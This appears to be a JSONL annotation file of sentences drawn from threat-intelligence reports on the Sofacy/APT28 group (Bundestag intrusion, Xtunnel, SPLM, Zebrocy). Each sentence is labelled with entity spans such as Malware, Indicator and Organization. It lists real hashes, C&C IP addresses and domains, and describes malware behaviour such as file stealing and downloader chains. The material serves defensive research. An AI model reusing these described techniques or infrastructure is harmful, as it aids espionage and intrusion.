{"text": "Name svchost.exe Size 1062912 MD5 5e70a5c47c6b59dae7faf0f2d62b28b3 SHA1 cdeea936331fcdd8158c876e9d23539f8976c305 SHA256 730a0e3daf0b54f065bdd2ca427fbe10e8d4e28646a5dc40cbcfb15e1702ed9a Compile Time 2015-04-22 10:49:54 .", "spans": [{"start": 5, "end": 16, "label": "Indicator"}, {"start": 34, "end": 66, "label": "Indicator"}, {"start": 72, "end": 112, "label": "Indicator"}, {"start": 120, "end": 184, "label": "Indicator"}]}
{"text": "Artifact #1 was retrieved from a File Server operated by Die Linke .", "spans": [{"start": 33, "end": 44, "label": "System"}]}
{"text": "The file is a 64bit-compatible compiled binary of the open source utility Winexe .", "spans": [{"start": 74, "end": 80, "label": "System"}]}
{"text": "Winexe is software similar to the more popular PSExec and is designed to allow system administrators to execute commands on remote servers .", "spans": [{"start": 0, "end": 6, "label": "System"}, {"start": 47, "end": 53, "label": "System"}]}
{"text": "While commercial solutions like Symantec pcAnywhere provide a larger feature-set , Winexe is lightweight , and doesn\u2019t require any installation or configuration .", "spans": [{"start": 32, "end": 40, "label": "Organization"}, {"start": 83, "end": 89, "label": "System"}]}
{"text": "One of the reasons Winexe is preferred over PSExec , is that it provides a Linux client , while PSExec doesn\u2019t .", "spans": [{"start": 19, "end": 25, "label": "System"}, {"start": 44, "end": 50, "label": "System"}, {"start": 75, "end": 80, "label": "System"}, {"start": 96, "end": 102, "label": "System"}]}
{"text": "Attackers are making growing use of utilities like Winexe and PSExec to perform lateral movement across compromised networks .", "spans": [{"start": 51, "end": 57, "label": "System"}, {"start": 62, "end": 68, "label": "System"}]}
{"text": "Besides providing the ability to execute arbitrary commands on the target system , these utilities normally don\u2019t raise suspicion as they are commonly whitelisted by Antivirus and other commercial security software .", "spans": []}
{"text": "Winexe acts as a Windows service that can be configured to automatically start at boot and silently wait for incoming commands over a named pipe .", "spans": [{"start": 0, "end": 6, "label": "System"}, {"start": 17, "end": 24, "label": "System"}]}
{"text": "Named pipes are a Windows inter-process communication method .", "spans": [{"start": 18, "end": 25, "label": "System"}]}
{"text": "Through named pipes , processes are able to communicate and exchange data even over a network .", "spans": []}
{"text": "In the case of Artifact #1 , the name of the pipe is ahexec , computers over the network could access the pipe server by simply opening a file handle on \\ServerNamepipeahexec .", "spans": []}
{"text": "Once connected to the pipe , a user or a program can easily provide information required to execute command ( just as they would normally through a command-line ) .", "spans": []}
{"text": "The provided information is then passed to a CreateProcessAsUserA call and the specified command is executed .", "spans": []}
{"text": "Once inside the network , Artifact #1 can be enough for the attacker to download or create additional scripts , execute commands and exfiltrate data ( for example , simply through ftp ) .", "spans": [{"start": 180, "end": 183, "label": "Indicator"}]}
{"text": "It is plausible that Artifact #1 could be present on other servers under different names , although it is also likely that the attacker only left it on servers to which they required maintainenance of persistent access .", "spans": []}
{"text": "Artifact #2 was recovered from the Admin Controller operated by Die Linke .", "spans": [{"start": 35, "end": 51, "label": "System"}]}
{"text": "This is custom malware , which despite large file size ( 1,1 MB ) , provides limited functionality .", "spans": []}
{"text": "Artifact #2 operates as a backchannel for the attacker to maintain a foothold inside the compromised network .", "spans": []}
{"text": "The properties of the artifact show that the same authors of the malware seem to have called it Xtunnel .", "spans": [{"start": 96, "end": 103, "label": "Malware"}]}
{"text": "As the same name suggests , the artifact appears in fact to act as a tunnel for the attacker to remotely access the internal network and maintain persistence .", "spans": []}
{"text": "After initialization , the artifact will attempt to establish a connection by creating a socket .", "spans": []}
{"text": "In case of failure , it will sleep for three seconds and try again .", "spans": []}
{"text": "The authors of the malware didn\u2019t appear to have spent any effort in concealing indicators or obfuscating code \u2013 the IP address with which it tries to communicate is hardcoded in clear-text inside the binary .", "spans": []}
{"text": "We can observe below , the procedure through which the artifact attempts to establish a connection with the IP address 176.31.112.10 .", "spans": [{"start": 119, "end": 132, "label": "Indicator"}]}
{"text": "This specific IP address is a critical piece of information that enables us to connect this attack to a spree of previous targeted campaigns .", "spans": []}
{"text": "The details of this attribution is explained in a dedicated section below .", "spans": []}
{"text": "We will refer to this IP address as Command & Control ( or C&C ) .", "spans": [{"start": 36, "end": 53, "label": "System"}, {"start": 59, "end": 62, "label": "System"}]}
{"text": "If the argument -SSL is given through command-line to the artifact , these beacons will be encapsulated in an SSL connection and a proper TLS handshake will be initiated with the C&C .", "spans": [{"start": 16, "end": 20, "label": "Indicator"}, {"start": 110, "end": 113, "label": "Indicator"}, {"start": 138, "end": 141, "label": "Indicator"}, {"start": 179, "end": 182, "label": "System"}]}
{"text": "Interestingly , the artifact bundles a copy of OpenSSL 1.0.1e , from February 2013 , which causes the unusually large size of the binary .", "spans": [{"start": 47, "end": 54, "label": "System"}]}
{"text": "More importantly , the Command & Control server ( 176.31.112.10 ) also appears to be using an outdated version of OpenSSL and be vulnerable to Heartbleed attacks .", "spans": [{"start": 23, "end": 40, "label": "System"}, {"start": 50, "end": 63, "label": "Indicator"}, {"start": 114, "end": 121, "label": "System"}, {"start": 143, "end": 153, "label": "Vulnerability"}]}
{"text": "While unlikely , it is worth considering that the same C&C server might have been the subject of 3rd-party attacks due to this vulnerability .", "spans": [{"start": 55, "end": 58, "label": "System"}]}
{"text": "If connections to the C&C are blocked or terminated through a firewall , the artifact will be inhibited , as it doesn\u2019t seem to have any fallback protocol .", "spans": [{"start": 22, "end": 25, "label": "System"}]}
{"text": "Additionally , since it does not execute any other functionality autonomously , it would no longer be a direct threat .", "spans": []}
{"text": "While attribution of malware attacks is rarely simple or conclusive , during the course of this investigation I uncovered evidence that suggests the attacker might be affiliated with the state-sponsored group known as Sofacy Group ( also known as APT28 or Operation Pawn Storm ) .", "spans": [{"start": 218, "end": 224, "label": "Organization"}, {"start": 247, "end": 252, "label": "Organization"}, {"start": 256, "end": 276, "label": "Organization"}]}
{"text": "Although we are unable to provide details in support of such attribution , previous work by security vendor FireEye suggests the group might be of Russian origin , however no evidence allows to tie the attacks to governments of any particular country .", "spans": [{"start": 108, "end": 115, "label": "Organization"}]}
{"text": "Sofacy is a group dedicated to the compromise of high-profile targets and the theft of confidential information .", "spans": [{"start": 0, "end": 6, "label": "Organization"}]}
{"text": "They appear to have been active since 2006 .", "spans": []}
{"text": "They are believed to have successfully attacked the Ministries of Internal and Foreign Affairs of several ex-Soviet countries , as well as Eastern European governments and military institutions , and NATO and the White House .", "spans": [{"start": 52, "end": 74, "label": "Organization"}, {"start": 79, "end": 94, "label": "Organization"}, {"start": 200, "end": 204, "label": "Organization"}, {"start": 213, "end": 224, "label": "Organization"}]}
{"text": "Sofacy is known for making extensive use of phishing attacks to lure targets into revealing their credentials via realistic reconstruction of internal systems , such as webmails , as employed against the Georgian Ministry of Internal Affairs in the infamous attacks that preceded the Georgian invasion of 2008 .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 204, "end": 241, "label": "Organization"}]}
{"text": "While Sofacy is also known to use of custom exploit frameworks and spear-phishing attacks , it is possible in this case that they managed to obtain privileged credentials of network administrators within the Bundestag through the use of a phishing attack , which then allowed them to navigate through the network and gain access to more data .", "spans": [{"start": 6, "end": 12, "label": "Organization"}, {"start": 208, "end": 217, "label": "Organization"}]}
{"text": "It is worth noting that shortly before the attack , security vendors reported the use of 0-day exploits in Flash Player and Microsoft Windows by the same threat actor .", "spans": [{"start": 89, "end": 94, "label": "Vulnerability"}, {"start": 107, "end": 119, "label": "System"}, {"start": 124, "end": 133, "label": "Organization"}, {"start": 134, "end": 141, "label": "System"}]}
{"text": "During investigation of the Command & Control server ( with IP 176.31.112.10 hardcoded in Artifact #2 ) , we managed to identify some operational mistakes made by the attackers , allowing us to connect the incident with attacks previously associated with the Sofacy Group .", "spans": [{"start": 28, "end": 45, "label": "System"}, {"start": 63, "end": 76, "label": "Indicator"}, {"start": 259, "end": 265, "label": "Organization"}]}
{"text": "The address , 176.31.112.10 , is a dedicated server provided by the French OVH hosting company , but is apparently operated by an offshore secure hosting company called CrookServers.com .", "spans": [{"start": 14, "end": 27, "label": "Indicator"}, {"start": 75, "end": 78, "label": "System"}, {"start": 169, "end": 185, "label": "Organization"}]}
{"text": "By researching historical data relevant to C&C 176.31.112.10 , we discovered that on February 16th 2015 , the server was sharing an SSL certificate with another IP address allocated to CrookServers and also hosted at OVH : 213.251.187.145 .", "spans": [{"start": 43, "end": 46, "label": "System"}, {"start": 47, "end": 60, "label": "Indicator"}, {"start": 132, "end": 135, "label": "Indicator"}, {"start": 185, "end": 197, "label": "Organization"}, {"start": 217, "end": 220, "label": "System"}, {"start": 223, "end": 238, "label": "Indicator"}]}
{"text": "The recovered shared SSL certificate , obtained by a public internet-wide scanning initiative , at the time had the following attributes :", "spans": [{"start": 21, "end": 24, "label": "Indicator"}]}
{"text": "MD5 b84b66bcdecd4b4529014619ed649d76 SHA1 fef1725ad72e4ef0432f8cb0cb73bf7ead339a7c Algorithm sha1 With RSA Encryption .", "spans": [{"start": 4, "end": 36, "label": "Indicator"}, {"start": 42, "end": 82, "label": "Indicator"}]}
{"text": "As shown , the certificate uses mail.mfa.gov.ua as a Common Name .", "spans": [{"start": 32, "end": 47, "label": "Indicator"}]}
{"text": "This suggests that this certificate might have been previously used for a similar attack against the Ukrainian Ministry of Foreign Affairs , or associated targets , although there is no documentation of such attack available to the public .", "spans": [{"start": 101, "end": 138, "label": "Organization"}]}
{"text": "More importantly , the IP address this certificate was shared with 213.251.187.145 was previously identified as used by Sofacy Group for phishing attacks against Albanian government institutions by registering the domain qov.al and creating realistic subdomains to lure victims into visiting .", "spans": [{"start": 67, "end": 82, "label": "Indicator"}, {"start": 120, "end": 126, "label": "Organization"}, {"start": 221, "end": 227, "label": "Indicator"}]}
{"text": "The domain was active on the IP 213.251.187.145 from July 2014 up until March 2015 .", "spans": [{"start": 32, "end": 47, "label": "Indicator"}]}
{"text": "These attacks against Albanian government institutions by the Sofacy Group were documented and reported by consultancy corporate PwC in December 2014 .", "spans": [{"start": 62, "end": 68, "label": "Organization"}, {"start": 129, "end": 132, "label": "Organization"}]}
{"text": "It is worth noting that this server also seems to be operated by CrookServers , since among other domains , 454-reverse.crookservers.net resolved to the same IP address .", "spans": [{"start": 65, "end": 77, "label": "Organization"}, {"start": 108, "end": 136, "label": "Indicator"}]}
{"text": "While the evidence presented strongly suggests a connection with the Sofacy Group , the artifacts ( in particular Artifact #2 ) are not publicly recognized to be part of the more traditional arsenal of these attackers .", "spans": [{"start": 69, "end": 75, "label": "Organization"}]}
{"text": "Nevertheless , on May 12th 2015 ( a few weeks after the attack against Bundestag appears to have started ) the American security firm root9B released a report containing details on malware samples very similar to Artifact #2 .", "spans": [{"start": 71, "end": 80, "label": "Organization"}]}
{"text": "The report also includes a mention of the same IP address used as Command & Control server in the attack against Bundestag ( 176.31.112.10 ) .", "spans": [{"start": 66, "end": 83, "label": "System"}, {"start": 113, "end": 122, "label": "Organization"}, {"start": 125, "end": 138, "label": "Indicator"}]}
{"text": "While the report appears to contain numerous inaccuracies , some of the indicators of compromises are legitimate and appear to be correctly attributed to Sofacy .", "spans": [{"start": 154, "end": 160, "label": "Organization"}]}
{"text": "A Slice of 2017 Sofacy Activity .", "spans": [{"start": 16, "end": 22, "label": "Organization"}]}
{"text": "Sofacy , also known as APT28 , Fancy Bear , and Tsar Team , is a highly active and prolific APT .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 23, "end": 28, "label": "Organization"}, {"start": 31, "end": 41, "label": "Organization"}, {"start": 48, "end": 57, "label": "Organization"}]}
{"text": "From their high volume 0day deployment to their innovative and broad malware set , Sofacy is one of the top groups that we monitor , report , and protect against . 2017 was not any different in this regard .", "spans": [{"start": 23, "end": 27, "label": "Vulnerability"}, {"start": 83, "end": 89, "label": "Organization"}]}
{"text": "Our private reports subscription customers receive a steady stream of YARA , IOC , and reports on Sofacy , our most reported APT for the year .", "spans": [{"start": 70, "end": 74, "label": "System"}, {"start": 77, "end": 80, "label": "System"}, {"start": 98, "end": 104, "label": "Organization"}]}
{"text": "This high level of cyber-espionage activity goes back years .", "spans": []}
{"text": "In 2011-2012 , the group used a relatively tiny implant ( known as \u201c Sofacy \u201d or SOURFACE ) as their first stage malware , which at the time had similarities with the old Miniduke implants .", "spans": [{"start": 69, "end": 75, "label": "Organization"}, {"start": 81, "end": 89, "label": "Organization"}]}
{"text": "This made us believe the two groups were connected , although it looks they split ways at a certain point , with the original Miniduke group switching to the CosmicDuke implant in 2014 .", "spans": [{"start": 126, "end": 134, "label": "Organization"}, {"start": 158, "end": 168, "label": "Malware"}]}
{"text": "The division in malware was consistent and definitive at that point .", "spans": []}
{"text": "In 2013 , the Sofacy group expanded their arsenal and added more backdoors and tools , including CORESHELL , SPLM ( aka Xagent , aka CHOPSTICK ) , JHUHUGIT ( which is built with code from the Carberp sources ) , AZZY ( aka ADVSTORESHELL , NETUI , EVILTOSS , and spans across 4-5 generations ) and a few others .", "spans": [{"start": 14, "end": 20, "label": "Organization"}, {"start": 97, "end": 106, "label": "Malware"}, {"start": 109, "end": 113, "label": "Malware"}, {"start": 120, "end": 126, "label": "Malware"}, {"start": 133, "end": 142, "label": "Malware"}, {"start": 147, "end": 155, "label": "Malware"}, {"start": 192, "end": 199, "label": "Malware"}, {"start": 212, "end": 216, "label": "Malware"}, {"start": 223, "end": 236, "label": "Malware"}, {"start": 239, "end": 244, "label": "Malware"}, {"start": 247, "end": 255, "label": "Malware"}]}
{"text": "We \u2019ve seen quite a few versions of these implants , which were relatively widespread at some point or still are .", "spans": []}
{"text": "In 2015 we noticed another wave of attacks which took advantage of a new release of the AZZY implant , largely undetected by antivirus products .", "spans": [{"start": 88, "end": 92, "label": "Malware"}]}
{"text": "The new wave of attacks included a new generation of USB stealers deployed by Sofacy , with initial versions dating to February 2015 .", "spans": [{"start": 53, "end": 65, "label": "Malware"}, {"start": 78, "end": 84, "label": "Organization"}]}
{"text": "It appeared to be geared exclusively towards high profile targets .", "spans": []}
{"text": "Sofacy \u2019s reported presence in the DNC network alongside APT29 brought possibly the highest level of public attention to the group \u2019s activities in 2016 , especially when data from the compromise was leaked and \u201c weaponized \u201d .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 35, "end": 38, "label": "System"}, {"start": 57, "end": 62, "label": "Organization"}]}
{"text": "And later 2016 , their focus turned towards the Olympics \u2019 and the World Anti-Doping Agency ( WADA ) and Court of Arbitration for Sports ( CAS ) , when individuals and servers in these organizations were phished and compromised .", "spans": [{"start": 48, "end": 56, "label": "Organization"}, {"start": 67, "end": 91, "label": "Organization"}, {"start": 94, "end": 98, "label": "Organization"}, {"start": 105, "end": 136, "label": "Organization"}, {"start": 139, "end": 142, "label": "Organization"}]}
{"text": "In a similar vein with past CyberBerkut activity , attackers hid behind anonymous activist groups like \u201c anonpoland \u201d , and data from victimized organizations were similarly leaked and \u201c weaponized \u201d .", "spans": []}
{"text": "This write-up will survey notables in the past year of 2017 Sofacy activity , including their targeting , technology , and notes on their infrastructure .", "spans": [{"start": 60, "end": 66, "label": "Organization"}]}
{"text": "No one research group has 100% global visibility , and our collected data is presented accordingly .", "spans": []}
{"text": "Here , external APT28 reports on 2017 Darkhotel-style activity in Europe and Dealer \u2019s Choice spearphishing are of interest .", "spans": [{"start": 16, "end": 21, "label": "Organization"}]}
{"text": "From where we sit , 2017 Sofacy activity starts with a heavy focus on NATO and Ukrainian partners , coinciding with lighter interest in Central Asian targets , and finishing the second half of the year with a heavy focus on Central Asian targets and some shift further East .", "spans": [{"start": 25, "end": 31, "label": "Organization"}, {"start": 70, "end": 74, "label": "Organization"}]}
{"text": "Sofacy kicked off the year deploying two 0day in a spearphish document , both a Microsoft Office encapsulated postscript type confusion exploit ( abusing CVE-2017-0262 ) and an escalation of privilege use-after-free exploit ( abusing CVE-2017-0263 ) .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 41, "end": 45, "label": "Vulnerability"}, {"start": 80, "end": 89, "label": "Organization"}, {"start": 90, "end": 96, "label": "System"}, {"start": 154, "end": 167, "label": "Vulnerability"}, {"start": 234, "end": 247, "label": "Vulnerability"}]}
{"text": "The group attempted to deploy this spearphish attachment to push a small 30kb backdoor known as GAMEFISH to targets in Europe at the beginning of 2017 .", "spans": [{"start": 96, "end": 104, "label": "Malware"}]}
{"text": "They took advantage of the Syrian military conflict for thematic content and file naming \u201c Trump \u2019s_Attack_on_Syria_English.docx \u201d .", "spans": [{"start": 91, "end": 128, "label": "Indicator"}]}
{"text": "Again , this deployment was likely a part of their focus on NATO targets .", "spans": [{"start": 60, "end": 64, "label": "Organization"}]}
{"text": "Meanwhile in early-to-mid 2017 , SPLM / CHOPSTICK / XAgent detections in Central Asia provided a glimpse into ongoing focus on ex-Soviet republics in Central Asia .", "spans": [{"start": 33, "end": 37, "label": "Malware"}, {"start": 40, "end": 49, "label": "Malware"}, {"start": 52, "end": 58, "label": "Malware"}]}
{"text": "These particular detections are interesting because they indicate an attempted selective 2nd stage deployment of a backdoor maintaining filestealer , keylogger , and remoteshell functionality to a system of interest .", "spans": []}
{"text": "As the latest revision of the backdoor , portions of SPLM didn\u2019t match previous reports on SPLM / XAgent while other similarities were maintained .", "spans": [{"start": 53, "end": 57, "label": "Malware"}, {"start": 91, "end": 95, "label": "Malware"}, {"start": 98, "end": 104, "label": "Malware"}]}
{"text": "SPLM 64-bit modules already appeared to be at version 4 of the software by May of the year .", "spans": [{"start": 0, "end": 4, "label": "Malware"}]}
{"text": "Targeting profiles included defense related commercial and military organizations , and telecommunications .", "spans": []}
{"text": "Since mid-November 2015 , the threat actor referred to as \u201c Sofacy \u201d or \u201c APT28 \u201d has been utilizing a unique payload and delivery mechanism written in Delphi and AutoIT .", "spans": [{"start": 60, "end": 66, "label": "Organization"}, {"start": 74, "end": 79, "label": "Organization"}, {"start": 152, "end": 158, "label": "System"}, {"start": 163, "end": 169, "label": "System"}]}
{"text": "We collectively refer to this package and related activity as \u201c Zebrocy \u201d and had written a few reports on its usage and development by June 2017 \u2013 Sofacy developers modified and redeployed incremented versions of the malware .", "spans": [{"start": 64, "end": 71, "label": "Malware"}, {"start": 148, "end": 154, "label": "Organization"}]}
{"text": "The Zebrocy chain follows a pattern : spearphish attachment -> compiled Autoit script ( downloader ) -> Zebrocy payload .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 72, "end": 78, "label": "System"}, {"start": 104, "end": 111, "label": "Malware"}]}
{"text": "In some deployments , we observed Sofacy actively developing and deploying a new package to a much smaller , specific subset of targets within the broader set .", "spans": [{"start": 34, "end": 40, "label": "Organization"}]}
{"text": "Targeting profiles , spearphish filenames , and lures carry thematic content related to visa applications and scanned images , border control administration , and various administrative notes .", "spans": []}
{"text": "Targeting appears to be widely spread across the Middle East , Europe , and Asia .", "spans": []}
{"text": "We identified new MSIL components deployed by Zebrocy .", "spans": [{"start": 18, "end": 22, "label": "System"}, {"start": 46, "end": 53, "label": "Malware"}]}
{"text": "While recent Zebrocy versioning was 7.1 , some of the related Zebrocy modules that drop file-stealing MSIL modules we call Covfacy were v7.0 .", "spans": [{"start": 13, "end": 20, "label": "Malware"}, {"start": 62, "end": 69, "label": "Malware"}, {"start": 102, "end": 106, "label": "System"}, {"start": 123, "end": 130, "label": "System"}]}
{"text": "The components were an unexpected inclusion in this particular toolset .", "spans": []}
{"text": "For example , one sent out to a handful of countries identifies network drives when they are added to target systems , and then RC4 like-encrypts and writes certain file metadata and contents to a local path for later Exfiltration .", "spans": []}
{"text": "The stealer searches for files 60mb and less with these extensions : .doc , .docx , .xls , .xlsx , .ppt , .pptx , .exe , .zip , .rar .", "spans": [{"start": 69, "end": 73, "label": "Indicator"}, {"start": 76, "end": 81, "label": "Indicator"}, {"start": 84, "end": 88, "label": "Indicator"}, {"start": 91, "end": 96, "label": "Indicator"}, {"start": 99, "end": 103, "label": "Indicator"}, {"start": 106, "end": 111, "label": "Indicator"}, {"start": 114, "end": 118, "label": "Indicator"}, {"start": 121, "end": 125, "label": "Indicator"}, {"start": 128, "end": 132, "label": "Indicator"}]}
{"text": "At execution , it installs an application-defined Windows hook .", "spans": [{"start": 50, "end": 57, "label": "System"}]}
{"text": "The hook gets windows messages indicating when a network drive has been attached .", "spans": [{"start": 14, "end": 21, "label": "System"}]}
{"text": "Upon adding a network drive , the hook calls its \u201c RecordToFile \u201d file stealer method .", "spans": []}
{"text": "SPLM / CHOPSTICK components deployed throughout 2017 were native 64-bit modular C++ Windows COM backdoors supporting http over fully encrypted TLSv1 and TLSv1.2 communications , mostly deployed in the second half of 2017 by Sofacy .", "spans": [{"start": 0, "end": 4, "label": "Malware"}, {"start": 7, "end": 16, "label": "Malware"}, {"start": 80, "end": 83, "label": "System"}, {"start": 84, "end": 91, "label": "System"}, {"start": 92, "end": 95, "label": "System"}, {"start": 117, "end": 121, "label": "Indicator"}, {"start": 143, "end": 148, "label": "Indicator"}, {"start": 153, "end": 160, "label": "Indicator"}, {"start": 224, "end": 230, "label": "Organization"}]}
{"text": "Earlier SPLM activity deployed 32-bit modules over unencrypted http ( and sometimes smtp ) sessions .", "spans": [{"start": 8, "end": 12, "label": "Malware"}, {"start": 63, "end": 67, "label": "Indicator"}, {"start": 84, "end": 88, "label": "Indicator"}]}
{"text": "In 2016 we saw fully functional , very large SPLM / X-Agent modules supporting OS X .", "spans": [{"start": 45, "end": 49, "label": "Malware"}, {"start": 52, "end": 59, "label": "Malware"}, {"start": 79, "end": 83, "label": "System"}]}
{"text": "The executable module continues to be part of a framework supporting various internal and external components communicating over internal and external channels , maintaining slightly morphed encryption and functionality per deployment .", "spans": []}
{"text": "Sofacy selectively used SPLM / CHOPSTICK modules as second stage implants to high interest targets for years now .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 24, "end": 28, "label": "Malware"}, {"start": 31, "end": 40, "label": "Malware"}]}
{"text": "The newer SPLM modules are deployed mostly to Central Asian based targets that may have a tie to NATO in some form .", "spans": [{"start": 10, "end": 14, "label": "Malware"}, {"start": 97, "end": 101, "label": "Organization"}]}
{"text": "These targets include foreign affairs government organizations both localized and abroad , and defense organizations \u2019 presence localized , located in Europe and also located in Afghanistan .", "spans": []}
{"text": "One outlier SPLM target profile within our visibility includes an audit and consulting firm in Bosnia and Herzegovina .", "spans": [{"start": 12, "end": 16, "label": "Malware"}]}
{"text": "Minor changes and updates to the code were released with these deployments , including a new mutex format and the exclusive use of encrypted HTTP communications over TLS .", "spans": [{"start": 141, "end": 145, "label": "Indicator"}, {"start": 166, "end": 169, "label": "Indicator"}]}
{"text": "The compiled code itself already is altered per deployment in multiple subtle ways , in order to stymie identification and automated analysis and accommodate targeted environments .", "spans": []}
{"text": "Strings ( c2 domains and functionality , error messages , etc ) are custom encrypted per deployment .", "spans": [{"start": 10, "end": 12, "label": "System"}]}
{"text": "This subset of SPLM / CHOPSTICK activity leads into several small surprises that take us into 2018 , to be discussed in further detail at SAS 2018 .", "spans": [{"start": 15, "end": 19, "label": "Malware"}, {"start": 22, "end": 31, "label": "Malware"}, {"start": 138, "end": 141, "label": "Organization"}]}
{"text": "The group demonstrates malleability and innovation in maintaining and producing familiar SPLM functionality , but the pragmatic and systematic approach towards producing undetected or difficult-to-detect malware continues .", "spans": [{"start": 89, "end": 93, "label": "Malware"}]}
{"text": "Changes in the second stage SPLM backdoor are refined , making the code reliably modular .", "spans": [{"start": 28, "end": 41, "label": "Malware"}]}
{"text": "It \u2019s interesting to note that this version of SPLM implements communications that are fully encrypted over HTTPS .", "spans": [{"start": 47, "end": 51, "label": "Malware"}, {"start": 108, "end": 113, "label": "Indicator"}]}
{"text": "As an example , we might see extraneous data in their SSL / TLS certificates that give away information about their provider or resources .", "spans": [{"start": 54, "end": 57, "label": "Indicator"}, {"start": 60, "end": 63, "label": "Indicator"}]}
{"text": "Leading up to summer 2017 , infrastructure mostly was created with PDR and Internet Domain Service BS Corp , and their resellers .", "spans": []}
{"text": "Hosting mostly was provided at Fast Serv Inc and resellers , in all likelihood related to bitcoin payment processing .", "spans": []}
{"text": "Accordingly , the server side certificates appear to be generated locally on VPS hosts that exclusively are paid for at providers with bitcoin merchant processing .", "spans": [{"start": 77, "end": 80, "label": "System"}]}
{"text": "One certificate was generated locally on what appeared to be a HP-UX box , and another was generated on 8569985.securefastserver.com with an email address root@8569985.securefastserver.com , as seen here for their nethostnet.com domain .", "spans": [{"start": 63, "end": 68, "label": "System"}, {"start": 104, "end": 132, "label": "Indicator"}, {"start": 141, "end": 146, "label": "System"}, {"start": 155, "end": 188, "label": "Indicator"}, {"start": 214, "end": 228, "label": "Indicator"}]}
{"text": "This certificate configuration is ignored by the malware .", "spans": []}
{"text": "Sofacy , one of the most active APT we monitor , continues to spearphish their way into targets , reportedly widely phishes for credentials , and infrequently participates in server side activity ( including host compromise with BeEF deployment , for example ) .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 229, "end": 233, "label": "System"}]}
{"text": "KSN visibility and detections suggests a shift from their early 2017 high volume NATO spearphish targeting towards the middle east and Central Asia , and finally moving their focus further east into late 2017 .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 81, "end": 85, "label": "Organization"}]}
{"text": "Their operational security is good .", "spans": []}
{"text": "Their campaigns appear to have broken out into subsets of activity and malware involving GAMEFISH , Zebrocy , and SPLM , to name a few .", "spans": [{"start": 89, "end": 97, "label": "Malware"}, {"start": 100, "end": 107, "label": "Malware"}, {"start": 114, "end": 118, "label": "Malware"}]}
{"text": "Their evolving and modified SPLM / CHOPSTICK / XAgent code is a long-standing part of Sofacy activity , however much of it is changing .", "spans": [{"start": 28, "end": 32, "label": "Malware"}, {"start": 35, "end": 44, "label": "Malware"}, {"start": 47, "end": 53, "label": "Malware"}, {"start": 86, "end": 92, "label": "Organization"}]}
{"text": "We \u2019ll cover more recent 2018 change in their targeting and the malware itself at SAS 2018 .", "spans": [{"start": 82, "end": 85, "label": "Organization"}]}
{"text": "A journey to Zebrocy land .", "spans": [{"start": 13, "end": 20, "label": "Malware"}]}
{"text": "The Sednit group \u2013 also known as APT28 , Fancy Bear , Sofacy or STRONTIUM \u2013 has been operating since at least 2004 and has made headlines frequently in past years .", "spans": [{"start": 4, "end": 10, "label": "Organization"}, {"start": 33, "end": 38, "label": "Organization"}, {"start": 41, "end": 51, "label": "Organization"}, {"start": 54, "end": 60, "label": "Organization"}, {"start": 64, "end": 73, "label": "Organization"}]}
{"text": "Recently , we unveiled the existence of a UEFI rootkit , called LoJax , which we attribute to the Sednit group .", "spans": [{"start": 42, "end": 46, "label": "System"}, {"start": 64, "end": 69, "label": "Malware"}, {"start": 98, "end": 104, "label": "Organization"}]}
{"text": "This is a first for an APT group , and shows Sednit has access to very sophisticated tools to conduct its espionage operations .", "spans": [{"start": 45, "end": 51, "label": "Organization"}]}
{"text": "Three years ago , the Sednit group unleashed new components targeting victims in various countries in the Middle East and Central Asia .", "spans": [{"start": 22, "end": 28, "label": "Organization"}]}
{"text": "Since then , the number and diversity of components has increased drastically .", "spans": []}
{"text": "ESET researchers and colleagues from other companies have documented these components ; however , in this article we will focus on what \u2019s beyond the compromise , what the operators do once a victim system is running a Zebrocy Delphi backdoor .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 219, "end": 226, "label": "Malware"}, {"start": 227, "end": 233, "label": "System"}]}
{"text": "At the end of August 2018 , the Sednit group launched a spearphishing email campaign where it distributed shortened URLs that delivered the first stage of Zebrocy components .", "spans": [{"start": 32, "end": 38, "label": "Organization"}, {"start": 70, "end": 75, "label": "System"}, {"start": 155, "end": 162, "label": "Malware"}]}
{"text": "In the past , Sednit used a similar technique for credential phishing .", "spans": [{"start": 14, "end": 20, "label": "Organization"}]}
{"text": "However , it is unusual for the group to use this technique to deliver one of its malware components directly .", "spans": []}
{"text": "Previously , it had used exploits to deliver and execute the first stage malware , while in this campaign the group relied entirely on social engineering to lure victims into running the first part of the chain .", "spans": []}
{"text": "The screenshot in Figure 1 shows Bitly statistics for the shortened URL used in this campaign .", "spans": [{"start": 33, "end": 38, "label": "System"}]}
{"text": "While ESET telemetry data indicates that this URL was delivered by spearphishing emails , we don\u2019t have a sample of such an email .", "spans": [{"start": 6, "end": 10, "label": "Organization"}, {"start": 81, "end": 87, "label": "System"}, {"start": 124, "end": 129, "label": "System"}]}
{"text": "The shortened URL leads the victim to an IP-address-based URL , where the archived payload is located .", "spans": []}
{"text": "Unfortunately , without the email message , we don\u2019t know if there are any instructions for the user , if there is any further social engineering , or if it relies solely on the victim \u2019s curiosity .", "spans": [{"start": 28, "end": 33, "label": "System"}]}
{"text": "The archive contains two files ; the first is an executable file , while the second is a decoy PDF document .", "spans": [{"start": 95, "end": 98, "label": "System"}]}
{"text": "Note there is a typo in the executable \u2019s filename ; Once the binary is executed , a password prompt dialog box opens .", "spans": []}
{"text": "The result of the password validation will always be wrong , but after the apparent validation attempt , the decoy PDF document is opened .", "spans": [{"start": 115, "end": 118, "label": "System"}]}
{"text": "That document appears to be empty , but the downloader , which is written in Delphi , continues running in the background .", "spans": [{"start": 77, "end": 83, "label": "System"}]}
{"text": "The IP address is also used in the URL hardcoded into the first binary downloader .", "spans": []}
{"text": "The Stage-1 downloader will download and execute a new downloader , written in C++ , not so different from other Zebrocy downloaders .", "spans": [{"start": 79, "end": 82, "label": "System"}, {"start": 113, "end": 120, "label": "Malware"}]}
{"text": "Once again this downloader is as straightforward as the Zebrocy gang \u2019s other downloaders .", "spans": [{"start": 56, "end": 63, "label": "Malware"}]}
{"text": "It creates an ID and it downloads a new , interesting backdoor , ( this time ) written in Delphi .", "spans": [{"start": 90, "end": 96, "label": "System"}]}
